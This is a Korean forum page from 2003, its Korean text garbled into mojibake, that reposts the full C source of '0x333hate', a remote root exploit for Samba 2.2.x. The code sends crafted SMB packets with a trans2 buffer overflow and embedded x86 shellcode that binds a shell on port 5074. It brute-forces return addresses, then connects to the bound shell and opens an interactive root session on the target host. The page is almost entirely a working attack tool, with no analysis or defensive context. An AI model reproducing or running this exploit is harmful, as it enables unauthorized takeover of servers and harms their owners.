BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: ±¸¸£¹Ì Samba 2.x remote expolit (x86) Á¶È¸¼ö: 5943


/* 0x333hate => samba 2.2.x remote root exploit
*
* generic linux x86 samba remote root
* exploit, based on trans2root.pl
*
* coded by c0wboy
*
* ~ www.0x333.org ~
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }

#define BUFFER 1500
#define SHELL 5074
#define PORT 139
#define NOP 0x90
#define START 0xbfffffff
#define STOP 0xbf000000
#define OFFSET 512

typedef enum {FALSE,TRUE} BOOLEAN;


unsigned char setup1[] =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00"
"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00"
"\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

unsigned char setup2[] =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00"
"\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64"
"\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

unsigned char overflow[] =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07"
"\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x90";

unsigned char shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

int main (int, char *[]);
void usage (char *);
void hate (unsigned long);
void exploit (void);
BOOLEAN connection (char *, int);
int owned (int);

char buffer[BUFFER];
char zero[808] = "";
char * target=NULL;
int port = PORT;

struct sockaddr_in temp;
struct hostent *h;
int fdsocket;

void
usage (char * prg)
{
fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg);
fprintf (stderr, " \t-t\ttarget to attack\n");
fprintf (stderr, " \t-p\tsamba port (default 139)\n");
fprintf (stderr, " \t-h\tdisplay this help\n\n");

exit(-333);
}

void
hate (unsigned long ret)
{
int i;
char *ptr=buffer;

bzero(buffer, BUFFER);

memcpy ((char *)ptr, overflow, 96);

ptr += 96;
memset ((char *)ptr, NOP, (772+36));

ptr += (772+36);
memcpy ((char *)ptr, shellcode, strlen (shellcode));

ptr += strlen (shellcode);
memset ((char *)ptr, NOP, (87+44));

ptr += (87+44);

for (i = 1127 ; i < 1159 ; i += 4)
*(long *) &buffer[i] = ret;
}

void
exploit (void)
{
BOOLEAN status;
char outside[333];

if(!(status = connection (target, port)))
fatal (" [~] Error in connection\n");

/* here we setup connection */
if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0)
fatal (" [~] Error in setup (1) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);

if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0)
fatal (" [~] Error in setup (2) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);

/* exploiting samba */
if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");

if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");

close (fdsocket);

if((status = connection (target, SHELL)))
{
owned (fdsocket);
close (fdsocket);
}
}

BOOLEAN
connection (char *host, int port)
{
BOOLEAN status = TRUE;

temp.sin_family = AF_INET;
temp.sin_port = htons (port);
h = gethostbyname (host);

if (h == 0)
status = FALSE;
else
{
bcopy (h->h_addr,&temp.sin_addr,h->h_length);

if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0)
status = FALSE;
else
if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0)
status = FALSE;
}
return status;
}

int
owned (int fdsocket)
{
fd_set cya;
char outside[1024], *cmd="uname -a;id;\n";
int x;

FD_ZERO (&cya);
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);

send (fdsocket, cmd, strlen (cmd), 0);

for(;;)
{
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);

if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0)
break;

if (FD_ISSET (fdsocket, &cya))
{
if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0)
fatal (" [-] cya\n");

if (write (1, outside, x) < 0)
break;
}

if (FD_ISSET (0, &cya))
{
if ((x = read (0, outside, sizeof (outside)-1)) < 0)
fatal ("[-] cya\n");

if (send (fdsocket, outside, x, 0) < 0)
break;
}

usleep(10);
}

fprintf (stderr, " [-] cya hax0r\n");
exit(0);
}


int
main (int argc, char * argv[])
{
int c;
unsigned long ret;

while((c=getopt (argc, argv, "ht:p:")) != EOF)
{
switch(c)
{
case 't': target = optarg; break;
case 'p': port = atoi (optarg); break;
case 'h': usage (argv[0]);
default : usage (argv[0]);
}
}

if (argc==1 || target == NULL)
usage (argv[0]);

fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");

fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
fprintf (stdout, " [-] starting bruteforce\n\n");

for (ret=START; ret>=STOP; ret-=OFFSET)
{
fprintf (stdout, " [-] testing 0x%x\n", ret);
hate (ret);
exploit ();
}
fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
return 0;
}




Ãâó : http://djosernet.dyndns.org/~outsiders/exploit.html

°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2003/05/24 15:23 from 210.102.250.168

  icmp based Shellcode ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ nt  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡